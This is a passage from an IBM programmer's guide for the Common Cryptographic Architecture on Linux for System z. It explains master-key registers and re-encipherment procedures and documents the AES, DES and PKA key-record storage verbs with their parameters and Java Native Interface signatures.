loaded, but not the LAST key part. See “Master Key Process +(CSNBMKP)” on page 93. +FULL The LAST key part has been loaded, but the SET command has not yet been called. See +“Master Key Process (CSNBMKP)” on page 93. +Current master-key (CMK) register +This register holds a master key that can be used to decrypt internal key tokens for keys in use with +normal cryptographic operations. Internal key tokens are protected under the master key; the keys are +actually stored outside the adapter. +The CMK register can be in one of these states: +EMPTY +No valid key has yet been established with the SET command in the life of this adapter, or the +adapter has been re-initialized to clear the master key registers. +VALID +Amaster key has been loaded with the SET command. +Old master-key (OMK) register +This is the master key that previously has been the CMK, before the master key that is now in the +CMK register. The OMK register can also be used to decrypt internal key tokens, but for these keys a +warning with return code 0 and reason code 2 is returned, along with the results from the requested +cryptographic operation. +The OMK register can be in one of these states: +EMPTY +No valid key is in this register. +VALID +Amaster key that previously was in the CMK register has been shifted to the OMK register by the +SET command. The same invocation of the SET command also shifted the contents of the NMK +register into the CMK register. +SET command +The SET command is invoked with “Master Key Process (CSNBMKP)” on page 93. The SET command +performs these operations: +1. The master key from the CMK register is copied to the OMK register. +2. The master key from the FULLNMK register is copied to the CMK register. +3. The NMK register status is changed to EMPTY. +Key Storage on z/OS (RTNMK-focused) +Design point - Keys should be re-enciphered to a master key in the NMK register. This forces the following +process to be followed when changing the master key: +v Load all the master key parts for a NMK, such that the LAST key part has been loaded, but the SET +command has not been issued. Now the NMK register is in the FULLstate. +v Re-encipher all of (for example: CKDS) an existing key storage to a copy of that key storage that is not +online, using the RTNMK rule_array keyword of “Key Token Change (CSNBKTC)” on page 163 (forAES +or DES) or “PKAKey Token Change (CSNDKTC)” on page 385 (for PKA), creating CKDS-pending. +Keys in this copy are enciphered under the NMK register, and so are not usable for normal +cryptographic operations. +v Invoke the SET command for the NMK. See “SET command.” Now the master keys in the current +CKDS are enciphered under the OMK (because of the shift), and are usable.Also, the master keys in +the CKDS-pending are also usable because the NMK has now become the CMK. +v Delete the old CKDS and change CKDS-pending to be the normal CKDS, completing the process. +264 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Storage for traditional IBM systems other than IBM System z +(RTCMK-focused: Linux, AIX®, Windows) +Design point - Keys should be re-enciphered to a master key in the CMK register. This forces the following +process to be followed when changing the master key: +v Load all the master key parts for a NMK, such that the LAST key part has been loaded, then issue the +SET command. Now the previous OMK is gone, the previous CMK is now the OMK, and the CMK +contains the newly-loaded value. See “SET command” on page 264. +v Re-encipher all of an existing CCAhost key storage data file's key tokens, which are enciphered under +the OMK, to be enciphered under the CMK. This is done using the RTCMK rule_arry keyword of “Key +Token Change (CSNBKTC)” on page 163 or “PKAKey Token Change (CSNDKTC)” on page 385. +– This immediately replaces operational keys with the re-enciphered version. +– The CCAkey storage file has a data structure with the verification pattern of the most recently SET +master key. The key storage implementation also allows writing external tokens into the key storage. +This means that external key tokens, and the internal key tokens encrypted under current master +key, will be allowed into the key storage. +It is impossible with current implementation to use RTNMK together with CCAkey storage. +v During the re-encipherment: +– Some of the keys in the CCAkey storage files are enciphered under the OMK (because of the shift) +and are usable +– Some of the keys in the CCAkey storage files are enciphered under the CMK, either because they +are new or because they have been re-enciphered. +– No new key tokens can be created with the key wrapped using the OMK. +Both types are usable for cryptographic operations. +Changing the master key for two or more adapters that have the same +master key, with shared CCA key storage +Because the verification pattern of the CMK is stored in a header in key storage, changing the master key +for a configuration of multiple adapters requires extra care. The master key verification pattern in key +storage has the following properties: +v It is checked once when a process starts. +v It is repopulated when the first CEX3C has its master key changed. +These two properties force the user to use the same process to change the master key for all CEX3Cs +after the first CEX3C. If the process exits (such as when the application completes), then the next time +that the application starts the key storage header will be checked and the master key verification pattern +will reflect the newly SET master key, which will cause a future attempt to set that same master key to a +second or third CEX3C to have a conflict with the key storage header. Therefore, using the same process +to change the master keys in all the CEX3C adapters is the only way to proceed if CCAkey storage is +being used. +There are several ways to change the master keys, most of which do not suffer from this limitation: +v ATKE can be used to change the master keys for all the CEX3C adapters in a group. +v An operator can directly change the master keys for a domain on a CEX3C from an IBM System z +management interface (physical access is needed). +v Auser application built to use the libcsulccamk.so library for this purpose, which can be programmed to: +1. Allocate a CEX3C by invoking “Cryptographic ResourceAllocate (CSUACRA)” on page 86. +2. Change the master key. +3. Deallocate each adapter in the group before exiting, by invoking “Cryptographic Resource +Deallocate (CSUACRD)” on page 88. +Chapter8.Keystoragemechanisms 265 + +v Note that the included utility, named panel.exe, is not designed to change the master keys for all the +cards in a group; this is a more sophisticated operation. +For details about panel.exe, see “The panel.exe utility” on page 553. +Key storage file ownership +The last user to access the key storage file owns it, due to the internals of the key storage functions. The +file is recreated after being compressed, and due to the file creation the owner is changed. +Having the set-group-id bit ( g+s ) on in the directory permission causes the file to be created with the +group owner the same as the directory group owner. The group read/write permissions on the file then +allow the other members of the group continued access to the file. +The Linux on IBM System z approach +Because the CCAkey storage design point for the Linux platform host release has always been +CMK-focused, this design point was taken forward for the Linux on IBM System z approach.At this time, +CCAhost key storage does not support nor ship with an additional utility to manage the 'store-in-pending' +approach to re-enciphering key tokens. This additional utility is necessary to work with use of the RTNMK +keyword for “Key Token Change (CSNBKTC)” on page 163 and “PKAKey Token Change (CSNDKTC)” on +page 385. Therefore, it is suggested that users wanting to make use of CCAhost key storage +management follow the 'RTCMK-focused' approach described in “Key Storage for traditional IBM systems +other than IBM System z (RTCMK-focused: Linux,AIX®, Windows)” on page 265. +However it is also desirable to provide as much host-support equivalence with the z/OS approach as +possible, given that the underlying system is running on a an System z platform and likely to collaborate +with z/OS software. Therefore, the RTNMK keyword is provided for “Key Token Change (CSNBKTC)” on +page 163 and “PKAKey Token Change (CSNDKTC)” on page 385 to allow users who have their own +utility or key storage management facility to manage key tokens using the method most familiar from z/OS: +v The key tokens to be enciphered should be passed directly (not by label) to “Key Token Change +(CSNBKTC)” on page 163 and “PKAKey Token Change (CSNDKTC)” on page 385 for re-encipherment, +and stored outside CCAhost key storage. +v When re-encipherment is complete and the “Master Key Process (CSNBMKP)” on page 93 SET' +command has been issued, the re-enciphered key tokens can be reintroduced to CCAhost key storage +if desired, using the standard mechanisms. +266 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +AES Key Record Create (CSNBAKRC) +AES Key Record Create (CSNBAKRC) +Use theAES Key Record Create verb to create a key-token record inAES key-storage. The new key +record can be a nullAES key-token or a valid internalAES key-token. It is identified by the key label +specified with the key_label parameter. +After creating anAES key-record, use any of the following verbs to add or update a key token in the +record: +v AES Key Record Delete +v AES Key Record Write +v Key Generate +v Key Token Change +| v Key Token Change2 +v Symmetric Key Generate +v Symmetric Key Import +| v Symmetric Key Import2 +Notes: +1. To delete a key record fromAES key-storage, use theAES Key Record Delete verb. +2. AES key records are stored in the external key-storage file defined by the CSUAESDS environment +variable. +Format +CSNBAKRC ( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array_count, +key_label, +key_token_length, +key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type:Array +| This parameter is ignored. +key_label +Direction: Input Type: String +Apointer to a string variable containing the key label of theAES key-record to be created. +key_token_length +Chapter8.Keystoragemechanisms 267 + +AES Key Record Create (CSNBAKRC) +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_token variable. If the +value of the key_token_length variable is zero, a record with a nullAES key-token is created. +key_token +Direction: Input Type: String +Apointer to a string variable containing the key token being written toAES key-storage. +Restrictions +The record must have a unique label. Therefore, there cannot be another record in theAES key storage +file with the same label and a different key type. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBAKRCJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBAKRCJ are shown here. +Format +public native void CSNBAKRCJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger key_token_length, +byte[] key_token ); +268 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +AES Key Record Delete (CSNBAKRD) +AES Key Record Delete (CSNBAKRD) +Use theAES Key Record Delete verb to perform one of the following tasks in theAES key storage file: +v Overwrite (delete) a key token or key tokens inAES key-storage, replacing the key token of each +selected record with a nullAES key-token. +v Delete an entire key record or key records, including the key label and the key token of each selected +record, fromAES key-storage. +Identify a task with the rule_array keyword, and the key record or records with the key_label parameter. To +identify multiple records, use a wild card (*) in the key label. +Note: AES key records are stored in the external key-storage file defined by the CSUAESDS environment +variable. +Format +CSNBAKRD ( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0 or 1. +rule_array +Direction: Input Type: String +Apointer to a string variable containing an array of keywords. The keywords are eight bytes in length +and must be left-aligned and padded on the right with space characters. The rule_array keywords are +described in Table66. +Table66.KeywordsforAESKeyRecordDeletecontrolinformation +Keyword Description +Task(One,optional) +TOKEN-DL DeletesakeytokenfromakeyrecordinAESkeystorage.Thisisthedefault. +LABEL-DL Deletesanentirekeyrecord,includingthekeylabel,fromAESkeystorage. +key_label +Direction: Input Type: String +Apointer to a string variable containing the key label of a key-token record or records inAES +key-storage. Use a wild card (*) in the key_label variable to identify multiple records in key storage. +Chapter8.Keystoragemechanisms 269 + +AES Key Record Delete (CSNBAKRD) +Restrictions +The record defined by the key_label must be unique. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBAKRDJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBAKRDJ are shown here. +Format +public native void CSNBAKRDJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_identifier ); +270 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +AES Key Record List (CSNBAKRL) +AES Key Record List (CSNBAKRL) +TheAES Key Record List verb creates a key-record-list file containing information about specified key +records in key storage. Information listed includes whether record validation is correct, the type of key, and +the date and time the record was created and last updated. +Specify the key records to be listed using the key-label variable. To identify multiple key records, use the +wild card (*) in the key label. +Notes: +1. To list all the labels in key storage, specify the key_label parameter with *,&rbl;&rbl;*.*,&rbl;&rbl;*.*.*, +and so forth, up to a maximum of seven name tokens (*.*.*.*.*.*.*). +2. AES key records are stored in the external key-storage file defined by the CSUAESDS environment +variable. +This verb creates the key-record-list file and returns the name of the file and the length of the file name to +the calling application. This file has a header record, followed by 0 - n detail records, where n is the +number of key records with matching key-labels. +The file is kept in the /opt/IBM/CEX3C/keys/deslist directory (assuming the directory name was not +changed during installation). These list files are created under the ownership of the environment of the +user that requests the list service. Make sure the files created kept the same group ID as your installation +requires. This can also be achieved by setting the 'set-group-id-on-execution' bit on in this directory. See +the g+s flags in the chmod command for full details. Not doing this might cause errors to be returned on +key-record-list verbs. +Format +CSNBAKRL( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label, +dataset_name_length, +dataset_name, +security_server_name ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type:Array +Apointer to a string variable containing an array of keywords. This verb currently does not use +keywords. +key_label +Chapter8.Keystoragemechanisms 271 + +AES Key Record List (CSNBAKRL) +Direction: Input Type: String +Apointer to a string variable containing the key label of a key-token record in key storage. In a key +label, you can use a wild card (*) to identify multiple records in key storage. +dataset_name_length +Direction: Output Type: Integer +Apointer to an integer variable containing the number of bytes of data returned by the verb in the +dataset_name variable. The maximum returned length is 64 bytes. +dataset_name +Direction: Output Type: String +Apointer to a string variable containing the name of the file returned by the verb. The file contains the +AES key-record information. When the verb stores a key-record-list file, it overlays any older file with +the same name. +The file name returned by this verb is defined by the CSUAESLD environment variable. +This verb returns the file name as a fully qualified file specification (for example, /opt/IBM/CEX3C/keys/ +KYRLTnnn.LST), where nnn is the numeric portion of the name. This value increases by one every +time that you use this verb. When this value reaches 999, it resets to 001. +security_server_name +Direction: Output Type: String +Apointer to a string variable. The information in this variable is not currently used, but the variable +must be declared. +Restrictions +None +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBAKRLJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBAKRLJ are shown here. +272 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +AES Key Record List (CSNBAKRL) +Format +public native void CSNBAKRLJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger data_set_name_length, +byte[] data_set_name, +byte[] security_server_name ); +Chapter8.Keystoragemechanisms 273 + +AES Key Record Read (CSNBAKRR) +AES Key Record Read (CSNBAKRR) +Use theAES Key Record Read verb to read a key-token record fromAES key-storage and return a copy +of the key token to application storage. The returned key token can be null. In this event, the key_length +variable contains a value of 64 and the key-token variable contains 64 bytes of X'00' beginning at offset 0. +Note: AES key records are stored in the external key-storage file defined by the CSUAESDS environment +variable. +Format +CSNBAKRR ( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label, +key_token_length, +key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type:Array +| This parameter is ignored. +key_label +Direction: Input Type: String +Apointer to a string variable containing the key label of the record to be read fromAES key-storage. +key_token_length +Direction: Input/Output Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_token variable. The +maximum length is 64. +key_token +Direction: Output Type: String +Apointer to a string variable containing the key token read fromAES key-storage. This variable must +be large enough to hold theAES key token being read. On completion, the key_token_length variable +contains the actual length of the token being returned. +Restrictions +None. +274 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +AES Key Record Read (CSNBAKRR) +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBAKRRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBAKRRJ are shown here. +Format +public native void CSNBAKRRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger key_token_length, +byte[] key_token ); +Chapter8.Keystoragemechanisms 275 + +AES Key Record Write (CSNBAKRW) +AES Key Record Write (CSNBAKRW) +Use this verb to write a copy of anAES key-token from application storage intoAES key-storage. This +verb can perform the following processing options: +v Write the new key-token only if the old token was null. +v Write the new key-token regardless of content of the old token. +AES key records are stored in the external key-storage file defined by the CSUAESDS environment +variable. +Note: Before using this verb, use the verb “AES Key Record Create (CSNBAKRC)” on page 267 to create +a key record in the key storage file. +Format +CSNBAKRW ( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label, +key_token_length, +key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0 or 1. +rule_array +Direction: Input Type:Array +Apointer to a string variable containing an array of keywords. The keywords are eight bytes in length +and must be left-aligned and padded on the right with space characters. +The rule_array keywords are described in Table67. +Table67.KeywordsforAESKeyRecordWritecontrolinformation +Keyword Description +Processingoption(One,optional) +CHECK SpecifiesthattherecordiswrittenonlyifarecordofthesamelabelinAESkey-storagecontainsa +nullkey-token.Thisisthedefault. +OVERLAY SpecifiesthattherecordisoverwrittenregardlessofthecurrentcontentoftherecordinAES +key-storage. +key_label +Direction: Input Type: String +276 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +AES Key Record Write (CSNBAKRW) +Apointer to a string variable containing the key label that identifies the record inAES key-storage +where the key token is to be written. +key_token_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_token variable. This +value must be 64. +key_token +Direction: Input Type: String +Apointer to a string variable containing theAES key-token to be written intoAES key-storage. +Restrictions +The record defined by the key_label parameter must be unique and must already exist in the key storage +file. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +You can use this verb with the key record create verb to write an initial record to key storage. Use it +following the Key Import and Key Generate verb to write an operational key imported or generated by +these verbs directly to the key storage file. +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBAKRWJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBAKRWJ are shown here. +Format +public native void CSNBAKRWJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger key_token_length, +byte[] key_token ); +Chapter8.Keystoragemechanisms 277 + +DES Key Record Create (CSNBKRC) +DES Key Record Create (CSNBKRC) +Use the DES Key Record Create verb to add a key record to the DES key storage file. The record +contains a key token set to binary zeros and is identified by the label passed in the key_label parameter. +The key label must be unique. +DES key records are stored in the external key-storage file defined by the CSUDESDS environment +variable. +Format +CSNBKRC( +return_code, +reason_code, +exit_data_length, +exit_data, +key_label ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_label +Direction: Input Type: String +The 64-byte label of a record in the DES key storage file that is the target of this verb. The created +record contains a key token set to binary zeros and has a key type of NULL. +Restrictions +The record must have a unique label. Therefore, there cannot be another record in the DES key storage +file with the same label and a different key type. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKRCJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKRCJ are shown here. +278 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +DES Key Record Create (CSNBKRC) +Format +public native void CSNBKRCJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_label ); +Chapter8.Keystoragemechanisms 279 + +DES Key Record Delete (CSNBKRD) +DES Key Record Delete (CSNBKRD) +Use the DES Key Record Delete verb to perform one of the following tasks in the DES key storage file: +v Replace the token in a key record with a null key token +v Delete an entire key record, including the key label, from the key storage file +DES key records are stored in the external key-storage file defined by the CSUDESDS environment +variable. +Format +CSNBKRD( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type: String +The 8-byte keyword that defines the action to be performed. The rule_array keywords are described in +Table68. +Table68.KeywordsforDESKeyRecordDeletecontrolinformation +Keyword Description +Task(Onerequired) +TOKEN-DL DeletesakeytokenfromakeyrecordinDESkeystorage. +LABEL-DL Deletesanentirekeyrecord,includingthekeylabel,fromDESkeystorage. +key_label +Direction: Input Type: String +The 64-byte label of a record in the key storage file that is the target of this verb. +Restrictions +The record defined by the key_label must be unique. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +280 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +DES Key Record Delete (CSNBKRD) +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKRDJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKRDJ are shown here. +Format +public native void CSNBKRDJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label ); +Chapter8.Keystoragemechanisms 281 + +DES Key Record List (CSNBKRL) +DES Key Record List (CSNBKRL) +The DES Key Record List verb creates a key-record-list file containing information about specified key +records in key storage. Information listed includes whether record validation is correct, the type of key, and +the date and time the record was created and last updated. +Specify the key records to be listed using the key-label variable. To identify multiple key records, use the +wild card (*) in the key label. +Note: To list all the labels in key storage, specify the key_label parameter with *, *.*, *.*.*, and so forth, +up to a maximum of seven name tokens (*.*.*.*.*.*.*). +This verb creates the key-record-list file and returns the name of the file and the length of the file name to +the calling application. This file has a header record, followed by 0 - n detail records, where n is the +number of key records with matching key-labels. The file is kept in the /opt/IBM/CEX3C/keys/deslist +directory (assuming the directory name was not changed during installation). These list files are created +under the ownership of the environment of the user that requests the list service. Make sure the files +created kept the same group ID as your installation requires. This can also be achieved by setting the +“set-group-id-on-execution” bit on in this directory. See the g+s flags in the chmod command for full +details. Not doing this might cause errors to be returned on key-record-list verbs. +DES key records are stored in the external key-storage file defined by the CSUDESDS environment +variable. +Format +CSNBKRL( +return_code, +reason_code, +exit_data_length, +exit_data, +key_label, +dataset_name_length, +dataset_name, +security_server_name ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_label +Direction: Input Type: String +The key_label parameter is a pointer to a string variable containing the key label of a key-token record +in key storage. In a key label, you can use a wild card (*) to identify multiple records in key storage. +dataset_name_length +Direction: Output Type: Integer +The dataset_name_length parameter is a pointer to an integer variable containing the number of bytes +of data returned by the verb in the dataset_name variable. The maximum returned length is 64 bytes. +dataset_name +Direction: Output Type: String +282 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +DES Key Record List (CSNBKRL) +The dataset_name parameter is a pointer to a 64-byte string variable containing the name of the file +returned by the verb. The file contains the key-record information. +The verb returns the file name as a fully qualified file specification. +Note: When the verb stores a key-record-list file, it overlays any older file with the same name. +security_server_name +Direction: Output Type: String +The security_server_name parameter is a pointer to a string variable. The information in this variable +is not currently used, but the variable must be declared. +Restrictions +None +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKRLJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKRLJ are shown here. +Format +public native void CSNBKRLJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_label, +hikmNativeInteger data_set_name_length, +byte[] data_set_name, +byte[] security_server_name ); +Chapter8.Keystoragemechanisms 283 + +DES Key Record Read (CSNBKRR) +DES Key Record Read (CSNBKRR) +Use the DES Key Record Read verb to copy an internal key token from the DES key storage file to +application storage. Other cryptographic services can then use the copied key token directly. The key +token can also be used as input to the token copying functions of Key Generate or Key Import verbs to +create additional NOCV keys. +DES key records are stored in the external key-storage file defined by the CSUDESDS environment +variable. +Format +CSNBKRR( +return_code, +reason_code, +exit_data_length, +exit_data, +key_label, +key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_label +Direction: Input Type: String +The 64-byte label of a record in the DES key storage file. The internal key token in this record is +returned to the caller. +key_token +Direction: Output Type: String +The 64-byte internal key token retrieved from the DES key storage file. +Restrictions +The record defined by the key_label parameter must be unique and must already exist in the key storage +file. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKRRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKRRJ are shown here. +284 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +DES Key Record Read (CSNBKRR) +Format +public native void CSNBKRRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_label, +byte[] key_token ); +Chapter8.Keystoragemechanisms 285 + +DES Key Record Write (CSNBKRW) +DES Key Record Write (CSNBKRW) +Use the DES Key Record Write verb to copy an internal DES key token from application storage into the +DES key storage file. The key label must be unique and the record must already exist in the key storage +file. +DES key records are stored in the external key-storage file defined by the CSUDESDS environment +variable. +Note: Before you use this verb, use the DES Key Record Create verb (see “DES Key Record Create +(CSNBKRC)” on page 278) to create a key record in the key storage file. +Format +CSNBKRW( +return_code, +reason_code, +exit_data_length, +exit_data, +key_token, +key_label ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_token +Direction: Input/Output Type: String +The 64-byte internal key token that is written to the DES key storage file. +key_label +Direction: Input Type: String +The 64-byte label of a record in the DES key storage file that is the target of this verb. The record is +updated with the internal key token supplied in the key_token parameter. +Restrictions +The record defined by the key_label parameter must be unique and must already exist in the key storage +file. +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +You can use this verb with the key record create verb to write an initial record to key storage. Use it +following the Key Import and Key Generate verb to write an operational key imported or generated by +these verbs directly to the key storage file. +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +286 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +DES Key Record Write (CSNBKRW) +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKRWJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKRWJ are shown here. +Format +public native void CSNBKRWJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_token, +byte[] key_label ); +Chapter8.Keystoragemechanisms 287 + +PKA Key Record Create (CSNDKRC) +PKA Key Record Create (CSNDKRC) +This verb writes a new record to the PKAkey storage file. +PKAkey records are stored in the external key-storage file defined by the CSUPKADS environment +variable. +Format +CSNDKRC( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +label, +token_length, +token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type: String +This parameter is ignored. +label +Direction: Input Type: String +The label of the record to be created, 64-byte character string. +token_length +Direction: Input Type: Integer +The length of the field containing the token to be written to the PKAkey storage file. If zero is +specified, a null token will be added to the file. The maximum value of token_length is the maximum +length of a private RSAtoken. +token +Direction: Input Type: String +Data to be written to the PKAkey storage file if token_length is nonzero.An RSAprivate token in +either external or internal format, or an RSApublic token. +Restrictions +None +288 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Record Create (CSNDKRC) +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDKRCJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDKRCJ are shown here. +Format +public native void CSNDKRCJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger key_token_length, +byte[] key_token ); +Chapter8.Keystoragemechanisms 289 + +PKA Key Record Delete (CSNDKRD) +PKA Key Record Delete (CSNDKRD) +Use PKAKey Record Delete to delete a record from the PKAkey storage file. +PKAkey records are stored in the external key-storage file defined by the CSUPKADS environment +variable. +Format +CSNDKRD( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +label ) +Parameters +For the 